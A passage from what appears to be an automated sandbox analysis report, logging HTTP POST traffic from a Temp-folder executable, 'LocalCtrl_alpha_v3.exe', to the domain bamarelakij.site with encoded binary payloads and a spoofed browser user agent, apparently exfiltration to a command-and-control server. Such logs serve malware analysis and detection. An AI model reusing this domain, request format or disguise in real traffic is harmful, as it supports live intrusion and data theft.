                                                                                                                                                                                                                                                                          2025-01-09 13:56:24 UTC15331OUTData Raw: 86 f2 a8 88 d2 a2 98 86 84 84 9c 9e 88 c6 a2 a6 88 a8 9a a2 cc ea 86 9c c4 96 98 82 b0 a2 b0 56 9e 9a 92 8c d2 94 c8 d0 cc d0 a4 68 e2 96 de 9a 60 a4 ac a6 da 82 ae d2 9c d8 60 ee 88 88 9e cc 92 70 68 9a 64 a4 ac 84 a2 94 ca 88 86 b2 b4 ae f4 f2 ce d2 e8 96 a6 d6 b4 c8 82 a2 a0 d2 de 6c c2 a8 dc 8a a6 92 d0 e8 ca b0 ce ec da 84 c2 6c ce e4 e8 6a 84 9c 68 d2 cc 88 ca 68 a4 e2 d6 c6 62 84 e8 68 82 c6 e0 a8 aa c6 82 66 9a 9c ee 86 b2 dc c4 92 dc da 8a 92 9a d0 a2 6e c4 96 9a 8e 84 86 d2 e0 90 94 8a 8c 9e 8e b4 ce c2 dc d4 e2 9a d8 8e 9c c6 8c ea ce 82 d4 ae f2 c4 c6 9a 84 b0 66 d6 ac 5e 86 6c da c6 d4 d6 94 dc ce 62 60 a8 84 c2 84 92 ac f0 5e da 8e 84 c8 62 e2 84 c6 e6 94 f0 c6 a0 ce 9a 98 de e0 8c ac 82 de 70 6a e6 d0 aa 8e ae ee b0 b0 88 72 b2 8e a8 e4 9e
                                                                                                                                                                                                                                                                          Data Ascii: Vh``phdlljhhbhfnf^lb`^bpjr
                                                                                                                                                                                                                                                                          2025-01-09 13:56:24 UTC15331OUTData Raw: 9c d6 96 62 d8 b4 9a 9c a6 e4 f4 6a 9c a8 d4 f4 f4 a6 a0 72 6c 56 56 9a e2 a8 82 b4 6c c6 ea b0 88 94 d8 c4 e6 e8 e8 b0 b4 a0 d0 de 8a ec 98 b0 9a a0 94 d4 9a da 88 82 64 96 66 e4 9e a2 82 ca da e0 60 ca 6a 9a 90 92 ec d2 e6 82 e2 a8 e6 ae b4 d0 62 d8 5e 68 f2 66 e2 a0 ea 86 64 66 ae 64 62 6c a6 f0 c8 ce f4 dc cc 9e 88 9c 56 f0 e2 d4 5e ca 6c 96 70 cc 8e ae 6c 8a a8 c8 f2 ce a0 84 f4 b4 9c c8 ec 88 6e e0 de f0 a0 ac 64 9c 5e aa f4 a8 ac 92 64 8a 5e aa f4 d4 d4 90 90 d0 56 94 8a d4 6e e2 a0 9a a6 d8 98 62 d6 c8 b2 b4 68 66 d4 e6 ce d2 8a f4 ea a0 a2 ac a0 82 b2 60 b2 a2 ae a0 a4 b4 ca 56 ce d0 cc 84 8c 6e 9e 86 f0 70 86 aa 6e 70 c4 e6 94 ac e0 da f0 6e 88 8a a4 ac 64 96 f0 ec d8 ec dc f0 d6 ae 82 d4 f2 f0 cc 9e a8 f0 9a 60 6c 6a 64 8c e0 e0 d6 66 de a2 6a
                                                                                                                                                                                                                                                                          Data Ascii: bjrlVVldf`jb^hfdfdblV^lplnd^d^Vnbhf`Vnpnpnd`ljdfj
                                                                                                                                                                                                                                                                          2025-01-09 13:56:25 UTC731INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:25 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SMMphFQrRc8OaHj7BeOtOnZMynzkkFF6HFDxAkx8yjfjT5jTvF9sdsvnsMhDpg3YNidfHlN9garCVurMIooPbd%2FZvhFKmZLNxD1n4EgWIe389PCZ%2B9eiP0k%2BMSCLg1KjHzX6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4ee35bcea4375-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1581&rtt_var=612&sent=227&recv=686&lost=0&retrans=0&sent_bytes=2837&recv_bytes=687619&delivery_rate=1760096&cwnd=32&unsent_bytes=0&cid=e1e6da583124eacf&ts=874&x=0"


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          28192.168.2.850095104.21.80.524432856C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:56:25 UTC386OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          p: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          Content-Length: 745
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
                                                                                                                                                                                                                                                                          2025-01-09 13:56:25 UTC745OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 95 00 00 00 c0 48 22 25 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 06 00 00 00 81 90 44 4a 00 00 00 00 25 81 21 00 00 00 00 c4 00 00 00 81 90 44 4a 00 00 00 00 a0 96 0c 0c 58 00 00 00 00 00 00 00 5a 00 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 96 0c 0e 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 a0 96 0a 0c 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0f 00 00 00 a7 00 00 00 84 03 ce 1a 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 2a 00 00 00 09 06 9d 34 00 00 00 00 25 81 25 2b 81 04 02 47 25 81 00 41 2b 81 02 02 47 25 81 00 41 00 00
                                                                                                                                                                                                                                                                          Data Ascii: H"%G6DJ%!DJXZZG6*4%%+G%A+G%A
                                                                                                                                                                                                                                                                          2025-01-09 13:56:26 UTC730INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:26 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U%2FUP6e%2FoDsJ3NLyLV4Ysjk7j%2BTwUdmKb%2FyvqcC9f6Jmd6MYmyEZYo5EGgIDHl6gb5rS6ZfH9DgZofiePMVfj5sihcCLEvliLdKsHm%2B27Ex0eIQrYKiXadMquPkN7y5hsMlsk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4ee3ebb9941f8-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1629&min_rtt=1617&rtt_var=632&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1767&delivery_rate=1697674&cwnd=223&unsent_bytes=0&cid=5207d6b1c699cc48&ts=325&x=0"


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          29192.168.2.850096104.21.80.524432856C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:56:26 UTC386OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          p: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          Content-Length: 212
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
                                                                                                                                                                                                                                                                          2025-01-09 13:56:26 UTC212OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 99 00 00 00 70 0b 5f 20 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 0e 00 00 00 e0 16 be 40 00 00 00 00 27 81 81 25 81 23 00 00 00 00 00 c4 00 00 00 e0 16 be 40 00 00 00 00 a0 96 0c 0c 58 00 00 00 00 00 00 00 5a 00 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 96 0c 0e 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 a0 96 0a 0c 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                          Data Ascii: p_ G6@'%#@XZZ
                                                                                                                                                                                                                                                                          2025-01-09 13:56:27 UTC732INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:27 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r%2ByZqMA0vIlT4ANlZj8HftVitfAAsbyh%2B0iTJQh0BoD2WOUsNcachYihaSHz478v4Y1XgRDkySmLJdZ8O%2Bk%2BpandSOJI%2BGk0GyneEuElE1aHiOw0f%2BPzHcImCmpL0UYyN0Dm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4ee449fc9431c-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1572&min_rtt=1569&rtt_var=595&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1234&delivery_rate=1829573&cwnd=237&unsent_bytes=0&cid=56ee8424aa7b9de9&ts=333&x=0"


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          30192.168.2.850097104.21.80.524432856C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:56:27 UTC386OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          p: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          Content-Length: 380
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
                                                                                                                                                                                                                                                                          2025-01-09 13:56:27 UTC380OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 95 00 00 00 1e 5a f7 29 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 06 00 00 00 3c b4 ef 52 00 00 00 00 25 81 21 00 00 00 00 c4 00 00 00 3c b4 ef 52 00 00 00 00 a0 96 0c 0c 58 00 00 00 00 00 00 00 5a 00 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 96 0c 0e 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 a0 96 0a 0c 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0f 00 00 00 94 00 00 00 13 6a 2a 23 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 04 00 00 00 26 d4 54 46 00 00 00 00 23 21 00 00 00 00 c4 00 00 00 26 d4 54 46 00 00 00 00 a0 96 0c 0c 58
                                                                                                                                                                                                                                                                          Data Ascii: Z)G6<R%!<RXZZj*#G6&TF#!&TFX
                                                                                                                                                                                                                                                                          2025-01-09 13:56:28 UTC732INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:27 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fkcRkyMb4fO8zQWgg2UdiPjL9MMdfyDnfgqyGAFiFqNu9W39bPYFt%2FwO%2BwtYd9VhbcWuAl8xNnSRuw%2B%2FkaoQkc7CrfF4WqJYNVBuhLgA3g3Yf%2FoPJ8f%2B052QpSBJJwaBURWX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4ee49fb1f4219-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1587&rtt_var=599&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1402&delivery_rate=1822721&cwnd=193&unsent_bytes=0&cid=1b32966173fa63d9&ts=267&x=0"


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          31192.168.2.850098104.21.80.524432856C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:56:28 UTC388OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          p: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          Content-Length: 14825
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
                                                                                                                                                                                                                                                                          2025-01-09 13:56:28 UTC14825OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 ae 39 00 00 eb bf 07 33 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 08 00 00 00 d7 7f 0e 66 00 00 00 00 27 81 00 21 00 00 00 00 f4 72 00 00 d7 7f 0e 66 00 00 00 00 a0 96 06 08 5a 00 00 10 10 00 3e 56 92 b2 b3 3a 56 71 ff ff ff ff ff ff ff ff 34 00 28 00 8e e4 c2 c4 c4 ca e4 b8 c8 ca e6 b8 84 9c 82 8e 9a 8e a6 a0 98 9e 5c e0 c8 cc 02 00 20 00 04 08 00 00 00 00 00 00 0e 08 00 00 00 00 00 00 02 04 08 fb f7 84 9c 82 8e 9a 8e a6 a0 98 9e a2 9c 96 98 ac a2 ae b2 b2 ae b2 8e 88 a8 9c 92 90 90 a0 a6 8e 96 b2 84 9c 84 9c 8e 8c a6 b4 8e b2 b2 8c aa ac 9c a6 9e b2 a8 82 9a b4 a0 9e 92 9e 96 9a 8c 8c ae 88 94 92 b2 86 94 8e a8 ae b4 a6 9a b0 82 88 84 a6 94 88 8a 96 88 a8 a0 b0 88 ac b2 84 92 b4
                                                                                                                                                                                                                                                                          Data Ascii: 93G6f'!rfZ>V:Vq4(\
                                                                                                                                                                                                                                                                          2025-01-09 13:56:29 UTC726INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:29 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EqFpH3kfmmnhl902a5NU%2F%2FZhsl440AadNSDn6iZyy5s4F8dhaXw0xx8YbIpr11xpAB0oUmStTB12tqLtBbvKySMwNTf7cqz2N6Tj1Le2Zs6keFYe0i9NmX8SjChT3UXFXgRW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4ee50be5341af-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1766&min_rtt=1711&rtt_var=753&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2839&recv_bytes=15871&delivery_rate=1353732&cwnd=224&unsent_bytes=0&cid=b2efb53748fe6b6b&ts=218&x=0"


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          32192.168.2.850099104.21.80.524432856C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:56:29 UTC388OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          p: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          Content-Length: 68959
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
                                                                                                                                                                                                                                                                          2025-01-09 13:56:29 UTC15331OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 24 0d 01 00 54 2f 9d 2d 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 93 18 00 00 a8 5e 3b 5a 00 00 00 00 37 81 4d 68 68 6a 70 62 6e 4d d0 ea c4 ca e4 e8 27 14 00 9b 94 ca 23 25 9b 0a 00 9b 08 00 9f 00 00 00 02 ff e9 00 00 b3 4c 92 dc e8 ca d8 50 a4 52 40 86 de e4 ca 50 a8 9a 52 64 40 86 a0 aa 40 6c 6c 60 60 40 80 40 64 5c 68 60 40 8e 90 f4 23 7f 9a d2 c6 e4 de e6 de cc e8 40 84 c2 e6 d2 c6 40 88 d2 e6 e0 d8 c2 f2 40 82 c8 c2 e0 e8 ca e4 81 87 b9 00 75 41 4d a6 f2 e6 e8 ca da 51 a4 ca ce d2 e6 e8 e4 f2 51 e6 da e6 e6 5c ca f0 ca 53 c6 e6 e4 e6 e6 5c ca f0 ca 57 ee d2 dc d2 dc d2 e8 5c ca f0 ca 53 c6 e6 e4 e6 e6 5c ca f0 ca 59 ee d2 dc d8 de ce de dc 5c ca f0 ca 59 e6 ca e4 ec d2 c6 ca
                                                                                                                                                                                                                                                                          Data Ascii: $T/-G6^;Z7MhhjpbnM'#%LPR@PRd@@ll``@@d\h`@#@@@uAMQQ\S\W\S\Y\Y
                                                                                                                                                                                                                                                                          2025-01-09 13:56:29 UTC15331OUTData Raw: d3 2c 40 19 b6 bd 3e 22 ff 6d bb 52 12 c6 17 36 12 39 e1 fc e6 1b bf ae c9 3c d6 38 17 28 f8 5d c2 b6 5a 4a e5 4a 2a de 42 d2 d6 65 e1 86 22 ca 79 9c f8 da 93 95 27 2e 3f be ae 58 75 75 5d af e7 a5 5b 5f 79 b7 7e ce 97 b7 bd 31 db 6d 50 c9 e3 b5 22 f1 75 93 2c 2d 8a 16 2f 47 7f e3 c1 98 8f 4a 7f fa 7e a4 cf f7 bd 4f e5 d0 ff 08 fc 32 2f 03 25 5c bb c7 c0 68 d7 e2 e7 17 0b 79 ef 3d 14 fa a7 09 38 9f 75 1f a8 e9 ec 31 bd c8 c3 ef dd df b7 72 cc 5f ee 78 a4 8b 2c 8b 0c 27 af 6f d1 82 ad ff 79 ae f9 7d 6a 88 f9 4f ba 9d 1f 0f be 89 ff 1e 88 fd 37 85 21 a4 29 81 c0 f1 5b 28 e6 ea 2b f1 d2 31 e5 96 0e 7b b1 ff 24 4f a1 e9 fd 06 06 fc d9 26 fe b7 4b 91 d5 c3 a7 4d ba b5 d4 92 c1 50 61 61 f9 e2 63 52 1d 50 fd b7 3c cd bf a5 4b c2 9d 9e 55 12 2a 8d f9 0e d3 e8 73
                                                                                                                                                                                                                                                                          Data Ascii: ,@>"mR69<8(]ZJJ*Be"y'.?Xuu][_y~1mP"u,-/GJ~O2/%\hy=8u1r_x,'oy}jO7!)[(+1{$O&KMPaacRP<KU*s
                                                                                                                                                                                                                                                                          2025-01-09 13:56:29 UTC15331OUTData Raw: 51 d4 2c e3 f2 4e 7b 0f 74 90 c0 e9 f8 cb ab e8 7f be 26 40 79 bc 11 08 94 9c f4 1e ea 5c 21 01 21 b0 1e 97 07 0c 60 21 e1 58 71 0e c3 31 78 54 5c ea a5 be 7a f0 21 ec 07 66 1e c1 b2 5e e8 4e 2e d7 48 72 65 68 d8 30 15 0c 47 21 19 48 46 6c 31 8c cc 22 36 15 e0 cc a8 5c e8 a7 c6 d2 cd ee b0 b7 60 9e a1 2f 0f 7e 87 31 c6 e8 25 4b 4c 55 be f5 68 a7 c6 0c 53 45 ed fd 16 6a fb ce 15 b8 45 02 5a 7c 34 c0 1f 6d b3 14 b3 49 3c af 9c 32 0d 3f 36 6e e4 b4 bb fa 1d 3c f9 6b 76 9b fc 2c d5 1e a2 34 13 ba 90 cc 12 91 fa 15 bb 19 76 da 9e d1 7d ec 1d 73 ea 23 74 0d 0d 3c 54 7e df b1 c8 1e 0e 7e 67 dc e8 f7 f5 49 b4 99 a7 54 da f7 d7 a7 43 b2 6a 75 98 4c 54 02 bd 2c f3 67 ac 84 92 a3 6b 4a 79 b0 48 a0 ff e5 16 69 f6 2c 12 58 bf 5f 1a bc 6f b4 78 d7 d8 d2 a2 bf b1 e0 15
                                                                                                                                                                                                                                                                          Data Ascii: Q,N{t&@y\!!`!Xq1xT\z!f^N.Hreh0G!HFl1"6\`/~1%KLUhSEjEZ|4mI<2?6n<kv,4v}s#t<T~~gITCjuLT,gkJyHi,X_ox
                                                                                                                                                                                                                                                                          2025-01-09 13:56:29 UTC15331OUTData Raw: 68 f0 f9 08 74 f2 a4 c7 c3 5d d2 74 fb 7d 94 bd e2 5b 27 a0 ff 18 66 12 e5 09 74 1c b8 c0 93 30 68 16 bc ac 71 8a 94 76 ff 15 45 ac 60 7f 16 4c bc a0 4b 64 40 bc a0 ce b9 66 16 3b 62 45 af e6 94 54 34 99 f0 47 a6 a4 3a ec dc 93 fc 47 a1 5a 2b 68 b9 e3 4a fc 55 ba 62 a2 00 03 ca a6 83 d6 4e 14 d1 0c b7 c5 61 2d 43 5b 54 a2 95 88 92 b1 13 c5 1a e6 45 6f 5c 3d fb c3 12 3e 8a 1c e5 56 c2 81 bd 63 30 33 d9 5b d0 f4 57 d9 1e 4a d0 bc 79 99 6c ad 36 b4 04 13 3e 70 4d 45 50 86 17 06 cd 9b c6 1e e5 17 48 16 0e e4 26 86 58 8e 46 e9 bc ee fa 93 23 6d c8 3e 29 22 65 3c de 88 60 2d e0 92 06 5e 91 23 80 07 b6 13 c4 3d b6 c5 60 8c 62 f3 68 6b ca 92 b0 b7 3b f6 55 13 ee fb f8 8c b4 4c b4 cc b3 38 3c dc 2f fa fe 52 d3 2d db b2 e9 db 98 d3 6a 3f 23 ec c8 c0 5b 23 af e7 4b
                                                                                                                                                                                                                                                                          Data Ascii: ht]t}['ft0hqvE`LKd@f;bET4G:GZ+hJUbNa-C[TEo\=>Vc03[WJyl6>pMEPH&XF#m>)"e<`-^#=`bhk;UL8</R-j?#[#K
                                                                                                                                                                                                                                                                          2025-01-09 13:56:29 UTC7635OUTData Raw: dc 38 51 85 04 04 d8 29 ec a9 a1 30 fe df fc 93 01 72 ad e5 c0 00 86 19 d4 2d 25 13 0d 35 6a f7 e6 9b da 4f 28 9c 27 9b 7d 74 1b 5f 33 93 61 47 dc 22 6d a5 db 05 6e ee e8 d1 54 d4 bd 54 03 7f 21 9d a3 bb 2d b8 d2 63 6f f4 ae e1 c4 76 46 d5 69 e7 bb fb 29 0a b6 4c a2 fd ea 62 c6 09 d0 d2 f3 1d 65 25 18 23 e6 2b a1 6d 80 76 d3 87 0f 9f bd 0c 1c 8d ab 71 f6 3d f2 a3 4b d8 cf ce 63 7d 1b d4 2c 12 da c8 7f d6 13 08 1d 7d 14 bc 61 0b db 88 6e 59 5b f2 21 2b 61 f2 a1 a1 96 49 5a 90 7e 47 9b b8 fa 82 d0 73 04 35 71 51 0c 30 9d 19 c6 f5 c7 9d ed 9c 2d f0 ae 91 f7 36 2c 8d 7e cd 4b e6 65 3a 9a 4c 71 58 ba 70 30 a8 58 a4 d7 a5 f8 9d a2 f0 72 bd ab 52 15 21 9b f4 a7 73 20 56 c7 31 bb 5f 60 4c d5 50 4d 39 18 c6 36 2c 02 e5 16 d5 1b d0 c0 67 18 6b 6b 94 76 4b 5e 97 77
                                                                                                                                                                                                                                                                          Data Ascii: 8Q)0r-%5jO('}t_3aG"mnTT!-covFi)Lbe%#+mvq=Kc},}anY[!+aIZ~Gs5qQ0-6,~Ke:LqXp0XrR!s V1_`LPM96,gkkvK^w
                                                                                                                                                                                                                                                                          2025-01-09 13:56:30 UTC729INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:30 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lRmWcx2XcbE6loaF93%2BbDrJSOSitCGQ6A8VK9sjKVvXVjrUCjbfCHBGbHY42%2ByVbGXbfaJDMSnHYQMFJ2gmNkYcomeLZO7%2FytIDfC4hO5hyDertBx4RCwgoRHTzj02JCBrJh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4ee56ee048c30-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2121&min_rtt=1832&rtt_var=894&sent=28&recv=76&lost=0&retrans=0&sent_bytes=2837&recv_bytes=70159&delivery_rate=1593886&cwnd=218&unsent_bytes=0&cid=a66ec9b8f082739d&ts=507&x=0"


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          33192.168.2.850100104.21.80.524432856C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
